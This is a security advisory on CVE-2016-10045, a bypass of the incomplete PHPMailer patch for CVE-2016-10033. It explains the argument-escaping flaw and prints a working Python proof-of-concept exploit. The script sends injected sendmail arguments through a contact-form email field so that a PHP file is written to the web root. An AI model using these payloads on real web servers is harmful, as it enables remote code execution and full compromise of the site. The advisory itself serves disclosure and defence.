The Chinese version of the analysis: http://paper.seebug.org/164/

BACKGROUND

“PHPMailer continues to be the world’s most popular transport class, with an estimated 9 million users worldwide. Downloads continue at a significant pace daily.”

http://phpmailer.worxware.com/

“Probably the world’s most popular code for sending email from PHP! Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and many more”

https://github.com/PHPMailer/PHPMailer

INTRODUCTION

An independent research uncovered a critical vulnerability in PHPMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application.

To exploit the vulnerability an attacker could target the common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class.

The first patch of the vulnerability CVE-2016-10033 was incomplete. This advisory demonstrates the bypass of the patch. The bypass allows to carry out Remote Code Execution on all current versions (including 5.2.19).

NOTE: The vulnerability / patch bypass was responsibly reported to the vendor in private on December 26th and a new CVE was issued by MITRE on the same day. However, a potential bypass was publicly discussed on the oss-sec list. Holding the advisory further would serve no purpose which is what triggered the earlier release of this advisory.

DESCRIPTION

The patch for CVE-2016-10033 vulnerability added in PHPMailer 5.2.17 sanitizes the $Sender variable by applying escapeshellarg() for escaping before the value is passed to mail() function.

It does not however take into account the clashing of the escapeshellarg() function with internal escaping with escapeshellcmd() performed by the mail() function on the 5th parameter.

As a result it is possible to inject an extra quote that does not get properly escaped and break out of the escapeshellarg() protection applied by the patch in PHPMailer 5.2.17.

For example: `` $mail->SetFrom(“"Attacker' -Param2-Param3"@test.com”, ‘Client Name’);

will result in the followig list of arguments passed to the sendmail program:

The Arg no. 0 == [/usr/sbin/sendmail] The Arg no. 1 == [-t] The Arg no. 2 == [-i] The Arg no. 3 == [-f"Attacker\] The Arg no. 4 == [-Param2] The Arg no. 5 == [-Param3"@test.com’]

`` An attacker could pass the-X parameter of sendmail to write out a log file with arbitrary PHP code.

This makes the current latest 5.2.19 and 5.2.18 versions of PHPMailer vulnerable to Remote Code Execution despite the patch.

A working PoC is presented below.

PROOF OF CONCEPT EXPLOIT

``

!/ usr/bin/python

PHPMailer_RCE_exploit.pl

intro = “”" PHPMailer RCE PoC Exploits

PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) + PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) (the bypass of the first patch for CVE-2016-10033)

Discovered and Coded by:

Dawid Golunski @dawid_golunski https://legalhackers.com

“”" usage = “”" Usage:

Full Advisory: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt

PoC Video: https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

Disclaimer: For testing purposes only. Do no harm.

“”"

import time import urllib import urllib2 import socket import sys

RW_DIR = “/var/www/html/uploads”

url = ‘http://VictimWebServer/contact_form.php’ # Set the destination URL here

Choose/uncomment one of the payloads:

PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)

payload = ‘"attacker" -oQ/tmp/ -X%s/phpcode.php some"@email.com’ % RW_DIR

Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)

payload = “"attacker' -oQ/tmp/ -X%s/phpcode.php some"@email.com” % RW_DIR

PHP code to be saved into the backdoor php file on the target in RW_DIR

RCE_PHP_CODE = “<? php phpinfo(); ?>”

post_fields = {‘action’: ‘send’, ‘name’: ‘Jas Fasola’, ‘email’: payload, ‘msg’: RCE_PHP_CODE}

Attack

data = urllib. urlencode(post_fields) req = urllib2. Request(url, data) response = urllib2. urlopen(req) the_page = response. read()

``

The researcher also developed an Unauthenticated RCE exploit for a popular open-source application (deployed on the Internet on more than a million servers) as a PoC for real-world exploitation. It might be published after the vendor has fixed the vulnerabilities.

Video PoC:

https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

BUSINESS IMPACT

A successful exploitation could let remote attackers to gain access to the target server in the context of the web server account which could lead to a full compromise of the web application.

SYSTEMS AFFECTED

All current versions of (PHPMailer <5.2.20) are affected.

Note that exploitation is not limited to systems with the Sendmail MTA.